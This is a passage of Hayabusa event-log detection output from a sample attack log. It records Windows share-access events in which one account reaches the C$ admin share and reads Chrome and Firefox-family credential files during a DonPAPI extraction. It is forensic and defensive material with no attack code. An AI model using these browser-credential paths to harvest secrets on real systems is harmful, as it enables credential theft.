+09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share 
Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.766 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.781 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.781 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.781 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full 
extraction.evtx +2021-12-12 16:16:03.781 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.781 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.781 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.797 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.797 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.797 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.797 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.797 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.797 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.813 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 
10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.813 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.813 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.813 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.813 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.813 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share 
Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.830 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.832 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.835 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.835 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.835 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.835 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.835 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.835 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.835 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.851 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File 
Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.852 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.852 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.852 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.852 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.852 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.852 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.868 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.868 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.868 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | 
Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.868 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.868 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.868 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.884 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.884 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | 
Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.884 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.884 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.884 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.884 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.899 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File 
Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.899 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.899 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.899 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.899 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI 
full extraction.evtx +2021-12-12 16:16:03.899 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.899 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.915 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.915 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.915 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.915 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.915 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.915 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.932 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.935 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All 
Users\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.935 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.935 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 